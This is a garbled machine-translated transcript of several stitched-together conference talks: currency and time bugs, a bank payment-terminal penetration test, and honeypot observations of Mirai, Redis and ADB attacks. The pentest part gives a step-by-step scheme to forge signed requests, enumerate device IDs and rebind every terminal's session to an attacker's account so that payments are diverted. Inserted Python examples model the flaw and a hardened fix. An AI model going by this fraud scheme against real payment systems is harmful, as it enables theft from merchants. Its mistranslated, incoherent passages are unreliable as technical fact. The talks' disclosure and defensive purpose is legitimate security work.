more precisely, since 2016 it has not happened at all. The Earth has been kind enough to spin at the same pace all the time and there has been no need for any corrections; at the moment we are at about 0.1 seconds of drift, which is very far from the risk zone. But what if this risk zone is approaching? Well, it will be necessary to introduce a new leap second. That would be an additional correction, and it will be very annoying, because no system anticipates it, and we have many more computers than in 2016. Some international body responsible for this whole business of time came up with the idea that we will give up the leap second

altogether, but at the latest by 2035. So for the next 10 years it may happen that the Earth spins much faster, and this leap second will have to be applied. Will it be necessary? Or maybe it won't, maybe it won't spin faster, we don't know. However, they promised that if they give it up in 2035, they will not bring it back for the next 100 years, so for all of us that's forever. And what will we do with this time that no longer agrees with astronomy? I don't know. I don't know what they have in mind. But if someone is programming financial systems, it is also worth remembering that

there are also strange things. After all, we have a currency, we have a value, and it always divides into 100 smaller units, right? Unless, for example, we have the yen. You can't pay half a yen or a tenth of a yen, because there is no such thing. Either there is a yen or there isn't. It can't be any different. The Kuwaiti dinar is divided into 10 dirhams and 1000 fils. All these patterns need to be implemented in software, especially when someone trades currencies. Madagascar's currency is divided into 5 things I can't even name. The same goes for the Mauritanian ouguiya. I like the Maltese scudo the most, which is accepted in very few places, but it is in the

official edition of the international currency standard. It is divided into 12 tarì, 240 grani and 1440 piccioli. A perfect currency, I would like to use it. So you have to remember that there are things like that, you have to read the specifications. I think that in our industry there are many people who like to read every document thoroughly and scrupulously, so you have to listen to these people and let them do their job. In general, the conclusions are very positive. It is safer on the road thanks to computers. There are fewer nuclear accidents. There are fewer car accidents. I think that in Warsaw alone there are probably half as many accidents this year. Only

because every fifth car on the road brakes by itself. We have much more effective medical therapies, we work more efficiently. We are still afraid of computers, we still do not understand how they work, we are still afraid that they will hurt us, but they have saved more lives than they have destroyed. I think this trend will continue. If you like such stories, there are two books that I highly recommend: Matt Parker, Humble Pi: A Comedy of Maths Errors, and, even funnier, Humans vs Computers by Gojko Adzic, who describes all the scenarios where, for example, someone in some country decided to change their first name and surname, in other words, to one

word.

Do I look like this at night when I hack? Does it ever look like that? Okay, so a few things to note. First, it was a real test, which the bank ordered. And therefore they wouldn't want the bank's logo to appear here. So all the screens are fake. There will be no... all references, if something seems similar to someone, are completely coincidental. That's why there won't be a live demo or a video. I can't show it, because there would be the bank's logo and various financial institutions. So I don't have it. Obviously I'm showing it for educational purposes and I'm not encouraging anyone to rob banks. What I'll show you can't be repeated, because it's

a mess. And also it was black-box, so I got the app to test, but I don't know how it all works. What I see is what I think it is; I have my opinions about what I saw. It may be that the reality is a bit different if you look at it from the perspective of the bank, which knows how it all works. So how did it work? There was a really big bank, and it ordered penetration tests. And what were these tests? The penetration tests concerned the application for a payment terminal. I didn't get the terminal physically. It didn't concern payment with credit cards or any other kind of payment. It concerned the application for this terminal. It was

on Android. And it concerned payment through such an alternative. I don't want to say the name of the system, but generally speaking it was something similar to, I don't know, we have a file, like PayPay or Revolut, so these are the systems in which we have our bank's application, some code appears to be typed, some QR code to be scanned, some barcode to be scanned, we put it into the terminal and then we confirm this payment in our application, on our phone. I can only say that it was a payment system that has, as I checked today, about a billion users. This payment system. So that's how it looked. I didn't have a terminal in my hands, I got an APK

for testing, so I had to install it on my device, so I don't know what it looked like physically at the client. What was here, what tools did I use? Android Studio was used to emulate it; there was certificate pinning, so I used Frida to deal with that. I used Burp Suite to watch the traffic. It was a bit too little, which I will also talk about, so I had to add something in Python. I had to decompile this code, so I used standard decompilation tools. I used the scrcpy (Screen Copy) tool for some screens. And I had to do something on my phone. I will first mention a few facts that may seem a bit pointless at

first, but later we will be able to put it all together in a meaningful way and then we will talk about it. First of all, what did the client get, or at least what I think he got. A client who signed a contract with the bank got a payment terminal. And this application was pre-installed on it as an alternative payment method. There was a separate application for this alternative payment method. And what? When the client received this terminal, apart from that, he had to receive three things on paper: a terminal ID, a license number and a refund password. The first two things had to be entered at the first launch to activate the application. The third thing was needed to

make a refund. If we wanted to cancel a transaction, return it to the store, then this password was needed to do something like that. And now, more or less, how it looked. When the client entered this data for the first activation, you could send such a request for the status of the application. And you could see the merchant data under which the terminal works. So you could see that there is a store, you can see the address, and here the Terminal ID appeared, which we were entering. This was necessary for debugging later; we will look at this tab later. Now, I will skip such things a bit, because I think we don't have time,

but if someone is interested, they will read it. In general, to make this work, we have to do a man-in-the-middle attack, i.e. we have to install a CA certificate on the device, because otherwise decrypting is not possible, but we can get in the middle, force it to connect to us and then we can start doing it again. But to do that we have to have either a certificate that we don't have, or our own certificate generated by our own CA, and we have to add it to the device. And this works at the level of the device's operating system. So with this operation, if we add the CA and it is trusted, we can do something like that. So we have to do it

to make Burp work. And this is quite standard. The second thing that was required was certificate pinning, which is additional security in the application. Most of the better applications have a high level of security, but here it is about the fact that not only is the certificate checked at the operating system level, but inside the application we have information about the certificate. So even if the operating system is modified by the user (it also depends on the configuration of the device whether that can be done or not), even if the operating system is modified and a certificate has been added, the application itself checks it again at the application level. And to get around this, you also need some magic here. But we have the tools ready for this,

we have Frida. It consists of two parts. We install one part on the phone or Android device, the other on the computer. And then we can start the application in a mode that will check what the security features are, because there are many ready-made solutions available online. When we start it, we can see which of the pinning systems is used. Here we can see that some TrustManager was used. You can see that for this specific domain, which is there, it is used only as pinning. And this is generally such a tool: we just take it out of the box and it works. And now, if we have also bypassed this certificate pinning, we can

actually observe what this application is sending. When the terminal was started, the first request that was sent to the domain was the login. That's what it looked like. Now let's take a closer look at what can be seen in this login. First of all, the terminal logs in with the two pieces of information we have in the contract: device ID and license ID. These are the two things that we give as a login and password. The second thing is that you can see that there is no VPN here; there is just a completely public host that it connects to. It connects over SSL; here there were also questions whether there was any client certificate. The next thing we can notice is that in this login response we

get something like a secret key. We don't know what it is at this stage, but when we write down the whole communication, pre-transaction, etc., nothing more will appear. This is something that you can't see anywhere else; you can only see it when logging in. It's not obvious what it's for. The next thing is that here, maybe it's easier to see on the first slide, we don't have a session anywhere. We log in. But there is no session, no cookies, no JWT token, nothing like that. It looks like no session is used. Okay, and now these data. You can see that we have these data here; these are the data that were shown later in this status panel, so when we log in, it returns the detailed data

that we see here in this status panel. So that's where this information comes from. Okay, now what you're asking about. What we can see is that we have something like a signature. If we change something in this request with Repeater in Burp, it doesn't work. This request is actually signed, and this signature must be correct for the request to be accepted. But there is something like that. And now the question is how this signature is generated and where it comes from. So you had to look at some sources. I'm not sure whether I got a version that was not obfuscated. Sometimes when we have tests, we get two versions, obfuscated or not. Whether it

was really production or not, I don't know. But even if it was obfuscated, these things are quite simple and it would be relatively easy to do, because here it is not so complicated. And now, if we look at these sources, there was the login, so we have a login class that we found, and in this login class, what can we see? We have something like this, here, this postData pack, so you can see that the data that will be in the POST are somehow packed into such a string, and then we generate this signature. You can see that the signature is generated by the function getSignature and it has two parameters. These are the data we sign, and here we have something we sign with, some key. You

can see that it is called postConfig.getPubKey. So we can look further in these sources for where it is. It's here. You can see that it is hardcoded. The question can arise whether it makes sense that we have some key hardcoded. We'll leave the answer to this question for a moment. But let's go further. How is this signature generated? This signature is generated quite simply. We simply have strings, we have all these fields that are in the request, which are signed, which are verified, and we have this plus sign. And from all this we just compute a hash of the concatenation. I don't want to go into details here, but by the book it shouldn't be like that, because it should

not be just a plain hash. In 99% of cases nothing bad will happen. But, for example, Gynvael Coldwind had a presentation that shows that something bad can happen here. And here it is important whether we add the key at the beginning or at the end, what the algorithm is, and it is also important what the data is. Because if this data were JSON, it would be worse. If we had, for example, simple system commands in the middle, we could append something, if the lengths fit the algorithm. It's a small probability that something like this will happen, but it shouldn't be like that for a banking application. If someone wants to discuss

it later, it's better to do it calmly; we can do something here. However, at this stage we have this key, we know how to compute this signature, so we can forge the login, we can change something there at will, and if we are able to, we can send it to the server and it will accept it at this stage. Now the question is, why is the secret key so important? If we look at other requests, for example here we have Print Report, so there is something else this application does, we see that we also have, analogously, data packing. We have a generated signature, everything is generic, we also sign these data, but

we sign with some other key. You can see that we have this "this.key", and this "this.key" is loaded earlier, and what is loaded earlier is "getPrivateKey". So we can see that there was a "publicKey", and here we have a "privateKey", which is something different. So now let's check where it comes from, in this class. So this class looks like this. You can see that if we fetch it, there is either some dummy data here, or the value of this class is taken from the variable, and this variable is set by setPrivateKey. And now let's see where this setPrivateKey is used in the code. It's not a big surprise that it's used in the SaveStyleInfo class. So we can see that

we get this response from the login. This is parsed, and inside it, when it's parsed, getSecretKey is used. So you can see that what we got in the getSecretKey response lands here as the private key, and it will be used to sign these requests later. And now the question was whether it was good or bad that it was hardcoded there. In general, nothing bad happens here, because with the first request we still have to enter the login and password, right? So nothing bad will happen there anyway, and then after the first request we will get another key anyway and sign with it again. That's why it's called private and public here. It's quite logical here, and it's allowed to work like whoever invented

it intended. Nothing bad is happening here. At this stage we can sign all requests, the first and the next ones. If we can sign, we can change the data. We can also put something together in a batch. But how to do it now? We can do it in Burp. When we go to Proxy, we have these HTTP Match and Replace rules. And there are static changes with regexes. But we also have something like a Bambda, in Java, and we can write code that will just run and replace it. And we can almost copy the code that we had already decompiled. We could put something here, we could also build the strings, we could go to the hash function and everything would work fine. And it worked for

me, but the problem was that these rules are intended for requests that are passing through, and there everything works fine. However, when we have Repeater, it doesn't fit here. And there were also problems with the order of doing it. So it worked, but it was... it's not very useful for me to do it this way. It's more of an interesting fact that it's easy to do it in Burp. But in practice it was easier to do it differently, so that Repeater worked easily. I just wrote it. I asked for some simple things in Python. It's very ugly, but it also shows that this code could be very ordinary and it would be enough for an attack. So you can see that there is a

proxy server written here, which will be handling GET and POST. We look inside, we look at the URL, depending on whether we choose the encoded one or some other one. I changed the name of the website. We just compute the hash, and it's sent. It works very crudely, because even if we have the right answer from Repeater, it adds a header, the data is added twice, it works ugly, and it's just about showing that it can work in an ordinary way and it works anyway. And now how to use it? When we have this Repeater, we can manually change where it is sent. So we could just change it to localhost, to port 8888, to our program. So everything that came from Repeater

would go into this program, it would compute this signature and send it on. When it came back with an answer, it would send it back. So it was a simple script that corrected all these signatures. So now I have a tool with which I can change these requests freely. And now I started changing this login request and I was looking at what could happen there, what would surprise me. Because generally, when there are tests, you have to change something and see whether something strange appears, what is interesting. So first I changed the device ID. I got several sets of these credentials for testing, I got two or three. So I could try with different ones. And now, if the device ID changed, then the

secret was also different; it's logical, there's nothing strange here. What was interesting and a bit strange was that if I logged in with the same device ID, the secret key would always be the same on a given day. When the day changed, it was no longer the same. It was as if there was a random generator, but its seed was the date. It was a bit strange. Everything was going well, but it was a bit of a question mark. Besides that, when you looked at what was inside the signature, there was also a timestamp. We suspect it was there to prevent replay attacks. So the idea was to insert the time into it. But the strange thing was that no one

checked whether the date was in the future. So theoretically, you could generate a request that could be sent later and it would still work. I didn't use it, I don't know if there were any other dangers, but it was also strange. Okay, and now the strangest thing was this. Since I had a couple of logins and passwords, I mean, it wasn't a login and password, it was an ID and a license number. When I swapped them, it was as if one user gave a password to another user, something like that. It turned out that it worked. I was surprised at why it worked. At first it seemed completely illogical, but then I started to wonder, maybe it was about this: if we have one
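The request signing described above (fields joined with a plus sign and hashed together with a key, plus a timestamp that was never checked against the future), rebuilt as an added Python example from a defender's side; this is not the bank's or the speaker's code. The field names, the per-device key, the time window and the sample request are constructed assumptions.

```python
import hashlib
import hmac

# Added example, not the bank's or the speaker's code. The field list and the
# "+"-joined packing are constructed to mirror what the talk describes.
SIGNED_FIELDS = ("deviceId", "licenseId", "timestamp", "body")


def pack(fields):
    """Join the signed fields with '+', the packing the talk describes."""
    return "+".join(str(fields[name]) for name in SIGNED_FIELDS)


def sign_plain_hash(key, fields):
    """The scheme seen in the app: a plain SHA-256 over key + packed data.
    For Merkle-Damgard hashes this is not a safe MAC (the length-extension
    property the talk alludes to); it is kept here only for comparison."""
    return hashlib.sha256((key + pack(fields)).encode()).hexdigest()


def sign_hmac(key, fields):
    """Hardened form: a real MAC keyed on the per-device secret from the login."""
    return hmac.new(key, pack(fields).encode(), hashlib.sha256).hexdigest()


class Verifier:
    """Server-side check: MAC, timestamp window (including the future-dated
    case the talk says was never checked) and replay of an accepted signature."""

    def __init__(self, key, max_age_s=120, max_skew_s=30):
        self.key = key
        self.max_age_s = max_age_s      # reject requests older than this
        self.max_skew_s = max_skew_s    # tolerated clock skew into the future
        self.seen = set()               # accepted signatures; keep bounded in production

    def verify(self, fields, signature, now):
        expected = sign_hmac(self.key, fields)
        if not hmac.compare_digest(expected, signature):
            return False, "bad signature"
        ts = int(fields["timestamp"])
        if ts > now + self.max_skew_s:
            return False, "timestamp in the future"
        if ts < now - self.max_age_s:
            return False, "timestamp too old"
        if signature in self.seen:
            return False, "replay"
        self.seen.add(signature)
        return True, "ok"


def demo():
    """Run the verifier over a constructed request and three abuse cases."""
    key = b"per-device-secret-returned-by-login"  # constructed sample key
    now = 1_700_000_000                             # constructed 'current' time
    req = {"deviceId": "12345678", "licenseId": "LIC-0001",
           "timestamp": now, "body": "amount=100"}
    sig = sign_hmac(key, req)
    verifier = Verifier(key)
    outcomes = [verifier.verify(req, sig, now)[1]]            # first use: ok
    outcomes.append(verifier.verify(req, sig, now)[1])        # same request again
    tampered = dict(req, body="amount=1")
    outcomes.append(verifier.verify(tampered, sig, now)[1])   # edited in Repeater
    future = dict(req, timestamp=now + 3600)
    outcomes.append(verifier.verify(future, sign_hmac(key, future), now)[1])
    return outcomes


if __name__ == "__main__":
    print(demo())
```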

shop, it has 10 terminals and 10 cash, someone decided that this license will be one, but you can log 10 terminals on one license. But it had to be paired somehow. I could change it at will and the logging would go. Which was strange. So they could do something like this, right? I had some license and ID terminals, these pairs, which could be logged on a cross, for example, and they were logged. And now I started to observe what was going on and how they were logged on the cross. When I changed this ID terminal, the secrets changed, right? Because it was already verified. On the other hand, if it was the same, it was

the same all the time. However, if I changed the license number, then the data in the status panel changed. And then the data of the store was shown, so it was closely related to this, and it was closely related to this. It depended on you. Okay, so this is the first perception. Now the next perception. I also got access to the administrative panel of the bank, where you could see the transactions that were entering the system, etc. And where the device ID was entered, the field was generally quite long, text-based. However, the data that I got, the example device ID, were all digital and had only 8 digits. So it was a bit strange, why is it possible to write alphanumeric values, but I don't do it. And now

what was even more interesting, when I logged in there, I saw that there were more of these terminals. And here we come to the interesting question: why were there more terminals? That's why there were more terminals. It was a test environment. However, it would probably be too expensive for the bank to set up a separate test environment for each test, so there was one test environment for various tests that took place on this banking system. That's why there were more terminals, because they were also used for testing other systems that integrated somewhere or whatever. So I could see what the other numbers of terminals were. They were all eight-digit, and it often happened that they appeared in a row. So it was weird, because if I compare it, if

it was alphanumeric, what would be the number of possibilities? And if they were only eight-digit, then we have 100 million of them. It's a lot, but not too much for a computer. So I can make it so that I can enumerate even all of them, if I learn a lot. It's doable, but if they are still close to each other, then I can enumerate them. So that's the second conclusion, how to count them. Okay, now with the session. I should clearly say that there was no session, because there was no bookies, no token, nothing like that. So here we have a question that shows us the history of the transaction on a given terminal. And now, what could be here instead of a session? Here were some additional headers,

but it turned out that it had no effect at all, it was completely ignored, the backend did not look at it at all. And you can see that in DQ-Waste we actually only have the DQ-Wise and DQ-Data. If it was like this, if a specific license was responding to a given device, then it could work on the backend. But if I could change it and another one would appear, then it means that... How did this server know which matchup I was in at the moment? There had to be a state on the backend, right? Because HTTP is stateless, so there had to be some state. But how was this state taken? How, if there is

no session? So there was a session that didn't exist. There was no such "frost" session, but the status was written somewhere and it was a virtual session around the device, not the secret, the pair, on the backend side. It's like, well, by deduction, you can come up with something like that, that it had to be like that, because otherwise there would be no server-level possibility of returning the right data to the right match. So that's the third observation. And now, if we combine all of these weird things, we'll wonder how these sessions worked. I said that when I changed the license number, it changed to Merchant. This means that this license specifically identified a given merchant, a given store, for example. If

we logged in, it means that we were given the license number and when we logged in, the license was paired with a given session. We said that we have a virtual session that is not available, but before that session, somewhere on the backend page, it was written that this session has such a license number. This is how it had to work. And now we also know that the secret key changed only once a day for this device ID. So now if it was like that, what would happen if we re-logged? If there was a new logging, then in fact the secret key was the same, so the conclusion is that the session ID, our virtual one, doesn't change at all, throughout the day. Every time we log in

again, the session ID is the same. If it was cookies, you would have said right away, "Well, how? After all, when we log in, it regenerates the session ID, when we log out, it regenerates the session ID." There was no session ID here, so the session ID didn't suffer, because it wasn't about suffering. And now... The question is, what if we take the second terminal that would log in with the same device ID. The second terminal logs in, but what happens now? The previous one will be logged out. It was normally logged out because the session identifier changed or it would no longer be important. But since it doesn't change all day, it turns out

that we have a new device logged in the device ID, and the old one is still logged in. It's not working here. We do a request and see what happens. And surprisingly nothing happened. Why didn't anything happen? Why didn't anything happen? Because if we looked here at how it was logged in, the data from merchants were only sent during the logging. So, if the other person logged in, he didn't do a new logging, but he had it cached at his place, so they didn't change. But now, if we take a request with a dynamic history, for example, we have a history there, we do a repeat with the same question, device ID and some other license. And it turned out that the terminal

showed a different story. The story of this merchant with this license ID. Because we managed to change the merchant in the back-end session. We injected other merchant data. Okay, now let's try to combine it all into some cool attack. I'm showing it because it's nice to show how to attack a bank, but if I wrote it in pieces, in a report, they wouldn't do anything about it. Only when there is a scenario, someone will react, it's experience. So it's not just for fun, but also to make someone notice it. And now how do we have to prepare for such an attack? We are attacking, we just open a fake store, register a store for some post or something. For this store, we have to open a

bank account. And now, when we have this bank account and we have the store documents, we go to this bank, which we know has such a great terminal, and sign a contract for such a payment terminal. And in this contract, we have to declare the number of our account, to which they are supposed to transfer all the money that people will pay us. And we get the terminal, which is not needed there, we cannot move it at all. We get the device ID in this contract, which is also not needed there, but we also get the license number. This license number is important because it is first of all paired with our merchant data, but in this log response, so that they don't see that

there is also an account number, but on the backend side there is also the account number that was in the contract. And now we're going to attack. We generate log requests, whether in Burp or in curl. And now what do we have to do? We have to take our license ID, because it will be paired with our account number, and we go to all or only to our device ID. In general, it is not a problem to go to all, there were 100 million possibilities, during the day you can do it without any problems. And now, if we do something like this, all these terminals in the entire bank network, they still work, they were logged in and these sessions are still

running as they were. Everything is fine. Only that for each session of all terminals in the entire banking network, we inject our license number. So, in fact, we pair them with our account. And now, if Paravalism is our account, then any payment in any of the shops in this entire network is completely normal. Someone pays in the shop, gets the money, the shop sees nothing strange, everything is normal, the payment passes, but all the money comes to us, to our account, not to the payment of a specific shop, but everything comes to our account. And that's how it looked. And now, what were the consequences of what was going on with it? So, we attacked all the terminals of the

entire network, but not even touching them, not communicating with them, because we were only talking to the backend. All the terminals were working perfectly fine. The only anomaly was that when we went into history, we could see our transactions, but we could also see other transactions, because suddenly the history became common. It was strange, but not so strange that someone would be very aware. If he wanted to check specifically whether the transaction had passed, then yes, it had passed, it is there. So that was the only thing that was visible, really on the terminal side. Bank administration, it just looked like it was done in our store. There was no trace at all that something strange happened here. What store was it? - A legitimate

store works. - Yes, a legitimate store works, but suddenly it has a lot of transactions. Taking into account the amount, I said that this payment system has a billion users, so interesting things could happen there. This bank doesn't have that many clients, but it's one of the big banks. And now, what else was interesting from all this?
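Since the talk describes the flaw only in words, here is an added example (not the bank's code; every device ID, license number and account number is a made-up value) that models the session-less backend keyed by device ID beside a hardened variant that issues a per-login token and refuses to re-pair the merchant:

```python
"""Model of the session-less terminal backend described in the talk.

Added example, not the bank's code. Everything here is constructed:
device IDs, license numbers and account numbers are made-up values.
The vulnerable backend keeps a "virtual session" keyed only by the
device ID and rebinds the merchant whenever a request carries another
license number. The hardened backend hands out a random token at login,
binds it to the device and the merchant, and rejects any attempt to
change that binding without a fresh login.
"""
import secrets

# Constructed "contract" data: which license belongs to which merchant account.
CONTRACTS = {
    "LIC-SHOP-A": "PL00 0000 0000 0000 0000 0000 0001",    # legitimate shop
    "LIC-ATTACKER": "PL00 0000 0000 0000 0000 0000 9999",  # attacker's shop
}


class VulnerableBackend:
    """State keyed by device ID only; any request may carry a new license."""

    def __init__(self):
        self.sessions = {}  # device_id -> {"license": ..., "account": ...}

    def login(self, device_id, license_no):
        self.sessions[device_id] = {"license": license_no, "account": CONTRACTS[license_no]}
        return {"status": "ok"}

    def history(self, device_id, license_no):
        # Bug: the license in an ordinary request silently replaces the one
        # established at login, so the device's session is re-paired.
        sess = self.sessions[device_id]
        if license_no != sess["license"]:
            sess["license"] = license_no
            sess["account"] = CONTRACTS[license_no]
        return {"license": sess["license"]}

    def payment(self, device_id, amount):
        return {"paid_to": self.sessions[device_id]["account"], "amount": amount}


class HardenedBackend:
    """Random per-login token; merchant binding fixed for the session's lifetime."""

    def __init__(self):
        self.sessions = {}  # token -> {"device": ..., "license": ..., "account": ...}

    def login(self, device_id, license_no):
        token = secrets.token_urlsafe(32)
        # A new login invalidates any earlier session of the same device.
        stale = [t for t, s in self.sessions.items() if s["device"] == device_id]
        for t in stale:
            del self.sessions[t]
        self.sessions[token] = {"device": device_id, "license": license_no,
                                "account": CONTRACTS[license_no]}
        return {"status": "ok", "token": token}

    def _session(self, token, device_id):
        sess = self.sessions.get(token)
        if sess is None or sess["device"] != device_id:
            raise PermissionError("unknown session or device mismatch")
        return sess

    def history(self, token, device_id, license_no):
        sess = self._session(token, device_id)
        if license_no != sess["license"]:
            raise PermissionError("license does not match the logged-in merchant")
        return {"license": sess["license"]}

    def payment(self, token, device_id, amount):
        return {"paid_to": self._session(token, device_id)["account"], "amount": amount}


def run_scenario():
    """Replay the talk's scenario against both backends; report where the money goes."""
    victim_device = "00001234"  # constructed eight-digit device ID

    v = VulnerableBackend()
    v.login(victim_device, "LIC-SHOP-A")
    # Replayed history request: victim's device ID, attacker's license.
    v.history(victim_device, "LIC-ATTACKER")
    vulnerable_payee = v.payment(victim_device, 100)["paid_to"]

    h = HardenedBackend()
    token = h.login(victim_device, "LIC-SHOP-A")["token"]
    try:
        h.history(token, victim_device, "LIC-ATTACKER")
        rejected = False
    except PermissionError:
        rejected = True
    hardened_payee = h.payment(token, victim_device, 100)["paid_to"]
    return {"vulnerable_payee": vulnerable_payee,
            "hardened_rejected": rejected,
            "hardened_payee": hardened_payee}
```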

I announced the similarities, they understood it, but later they said that there was a problem with the bookkeeping. It was a test system, but because it worked with different systems, because it was still not a provider, there were real bank accounts, real cash, but there were some cents, small amounts, but there were real accounts and real money. And now suddenly, the money was somehow mixed between the accounts, and we have no idea what and why, or how to reverse it now. It's nice that there's tax and so on, but you have to turn it around, because the accounting system is not able to do anything about it. It's on the tests themselves. To make it funny,

I said that these tests were common, that it was a test environment. Some transactions, some links, some strange things started to appear, because different teams tested different things there, and probably some integrations with completely different systems. So here, even though it was a test environment, it became a kind of a mess. So it was funny. But in the end, I asked them: "You know what, this URL was like this, maybe if I change it a bit and delete this test from the front?" It was a great scare. Why was it scary? It was suspicious because this application was not the first version. There was already some version, it was tested. They just changed something there.

That's why I got it for testing. So the authenticity was already there on the production and it would be fun if I just took it off and it would probably be very fun. I mean, I would really have to guess this Merchant license, but it's doable. Well, strange things could happen. You probably got it on Mail, right? I don't know, but it was... Maybe it was a test? Even on the test one, there was a problem and the real money was so confused that it had a big problem. And I had to do all these transactions later, just make a return. It was the only option, you had to return everything and then it returned to such a state. That's it, if there are

any questions, I'm sorry. I don't know, because it's not true, honestly, because there was no need for it. I mean, he wasn't able to check if it was invalid, because there was a signature that wouldn't fit, that would be a bad signature, because it would be a key to sign something wrong. It's a hash, you can't check what it was signed with, you can only check if it's signed correctly. So, it's a bit of a misrepresentation. I'm not really afraid to check it, because it's hash, so we can't check what was in the hash, maybe it's good, because it's the same as we signed. You can hash it again, because it will be more tempting to check it. Yes, there is a link between

the invalid and the public. So the names were private key and public key because you allowed the presentation to be published? Or it was actually legal? Because there was nothing in common with the public key. In this sense, there is nothing in common. But if we put it this way, in this sense it is public, so that's why it is coded and that it is legal, that it is coded because it is public. I often came across this, that something was called, so that when someone quickly looked at the page, It was only in the first request that I have to know the other data. But it's still not asymmetrical. Yes, but there is no such thing.

In this sense, yes, it makes no sense. Only someone pointed it out so that it can leak out. That's why it's private. Only then there is an audit, someone will find out if it is private or public. And this is another thing. Maybe they called it that for their own internal reasons. But the logic is that it was... We agree that it may leak out. It means that security is not based on the authenticity of this thing. And there was no such thing here. What is it used for? It was just about the ability to pass all requests through the same code. The first one passed through the other, and the second one only passed

through this one. Well, not exactly, because you still have to submit the data here, right? Because you still have to submit good data, because it doesn't change much. If you didn't know them, it wouldn't change much anyway. Well, it didn't change much, but... Well, generally, it changed a lot, but it was just a danger. Let's say so. I wonder how they got there. I don't know, if you have time, it's still a matter of these... This HMAC and hash. The same question: why was there a nonce if they don't use it? I don't know. Maybe it was for the sake of it. I don't know, I have no idea what it was for. In the

search time, the functionality of the hash function based on the method of the Vanguard is that if we know the value of the function for a string and we know the value of the string, we can calculate the value of the hash function for the string plus something we are able to calculate, the string we control. Yes, but it's also about where we write the key. If we write it in the front, we can add another iteration. For example, here we have MD5. In MD5, the state is... We can't write something that is secret. Exactly. And if it's at the beginning, in some cases it's like... The hash is automatically the beginning

of the next iteration. We can add another iteration based on the hash we already have. We don't need the front, we just add the back. We just need the data to match the blocks. That's one condition. The second is to add. If we have a form of data in the middle, like JSON, and we have an appendix, then we'll get garbage. But if we have something we can add, - Something like that. I don't know if it's called that. Anyway, we can use this hash... And when we have an HMAC, it's a bit different, because we divide this key into two parts and we do two hashes, first at the beginning, and then the second part at the beginning. And the division is chosen in a sensible way.

We do this to separate the key and it's chosen according to the method, so that it works in a sensible way. It's called the extension. I don't know what it's called, I know what to do in practice. It's a good approach, no matter what the name is, no matter how it works. I'm sorry, I'm not sure what you mean by that. I think the best person in the big area would be here to explain it exactly. I'm not sure. So, generally speaking, making a signature based on a hash of the Nesting glue is not a very good idea. It's not very likely that something will happen, and if something happens, it's not good. Well, I don't know, maybe there are some questions. At

first, there are some kind of bullshit. Then too. So, welcome to my presentation. My name is Jupot, the aggressor is Ponypot. My nickname is "Kryptowski" and I've been a Kryptofan fan for over 30 years. In addition, I deal with UNIX, networks, their destruction. I have been dealing with electronics for almost 30 years or even more. It is a micro-optical project and it is made in my free time. The presentation is not for my employer. I tried to recognize it in one way or another. And how he will recognize this honeypot, we will see how he recognizes it. And I found out where this term came from. If someone knows, then probably they will know. And does anyone know the first "An Evening

with Berferd"? Does anyone know this publication? There was a first publication about something that was later. The guy did something that emulated services that were popular at the time, namely, sendmail, with this hole, which was also FTP, GDEMON, some account, the possibility of logging on the Internet, he set up an account there, and he was still there until 1991. And there is also The Cuckoo's Egg by Clifford Stoll, which probably some people read. A very nice book. Stoll is also a football player, and he describes the event from 1986. The guy just had a guy, someone entered his network on his Uber, and he actually did from that honeypot or what the attacker is doing there. And even did something

like that, that he put some fake documents there, some fake actions, because he puts with these actions, then someone tried to contact there. Now we would call it a canary token. In any case, it is totally nothing new. Does anyone know PHF? Yes, yes, yes. And everyone is smiling, as I can see. Those who know. This is a script that was made in the former server of the NCSA www, and then in Apache, which was created from it. It was a script that showed how CGI scripts work. It was a demo of a telephone book. And this demo of a telephone book was very good for making comments on servers. But interestingly, when the tax came out, it was

probably done together. Okay, now the question is what services. Well, there are such things. And maybe we would also put some of these things, for example, database in the Internet. Such a little more, well, it rarely happens that some Kubernetes, Docker, such things are also put out by people. And maybe something even more exotic, like Minecraft server or Asterisk, for example, a VoIP server. We could also have some proprietary interfaces, some unknown protocols. Why limit ourselves to only display what could be on some Linux, for example, or on some PC or server equipment, because we could, for example, display some IoT. some letters, cameras, all those things that are now being used. And there is no need to separate the system, because maybe Linux, Windows, right? And

it's best for various architectures, CPUs. And it's all cool, but it's just not realistic enough to do it all. And basically, at this point we can end the presentation, because we can't stop it. It's impossible to emulate all of this. But, maybe we won't end the presentation. Do you remember how these worms worked? We have a Telnet server on some exotic IoT platform, for example, We have a Waka that can attack this type of things. It gets a remote code on our IoT device. I will make a clip-up of some tools there. And here is an example of a session. This is a dump. So, we log in, you can see from some settings, how the device is set up, from which the client will

connect to the server. He set up a login prompt, he got some user, in this case, he entered some password, and then he got, he actually logged in, and because he is an RM user, he does RM. And that's it, we see the whole session. And here, a quick demo.

Here it connects to our attack, to our honeypot, and it logs in. And it makes a command. And we can watch this one, this one, and we can observe our session. For example, what does Mirai do? It will look for a directory in which it can write. Then it will try to pull some kind of a wget, or a tftp, or a curl. Whatever is available on the device, it will try to pull some script and then it will try to run it. If it doesn't work, it still has a form in which it is able to create a directory with echo and then run it. And we, our

Mr. Potniwe, how to enable the internet, and we caught it and then we can analyze it, for example, report it to the website. And what devices, just looking at the telnet, it's just a very short list of what we managed to identify, for example, on the wires. However, there is much, much more of it, whatever, right? I mean, some routers, some cameras, only cameras, some epithelium, epithelium, everything. And now something different, something that hasn't come to us yet, is the interface that manages Asterisk. And here we can also observe what the attacker does. In this case, he adds the number of the agent in this center, to which the call will cause the command to be made. And there the

command is on the same goal. Again, it is dragging something on the block. Of course, all these sessions are shortened, but then there is a call attempt from the Asterisk interface. We can see what's inside, here's some controlled mod. And again, Ponypod doesn't know how to emulate Asterisk, but we can get it. Ok, something more exotic. There are a lot of attacks on Redis, in the sense of Redis servers that will attack you. Here is an addition to the scheduler, the execution there, well, there is something encoded there, it is base64 and then it is re-arranged. We can of course decode it and see what the attackers want to do there. And there are many other variants of this. In this

case, it is most likely a campaign called Petra. And here is a presentation of this campaign. This is something else. This is very active. This is a question from the doctor. and here is the open doc in the Internet and someone here does with some antenna with a nice Nux and then it will be encoded again some kind of screen, also encoded with a shell. We can also see what it is. There is a lot of it. People only put the characters out, and then others take them over and use it, firstly to find, to propagate further from some of their own robots, but there is also a lot of work done there. This is just what the instamillator does, it takes the script from

the Tor and then puts something there. And again, this honeypot absolutely does not know how to emulate Redis, but still we can see what the attacking robot is doing. And something even more strange, some device has an ADB set up, Android Internet. And here you can see that someone is connecting to the ADB, trying to make some kind of a call or a call-me-u-f-o-miner, is looking for a process called Trinity. This session is much longer, but this is the campaign called Trinity and here is also a link to the description of this campaign on the website. And again, my phone can't emulate ADB, but it's very cool to watch the whole session on it. And there's a lot of it, so I'll show you

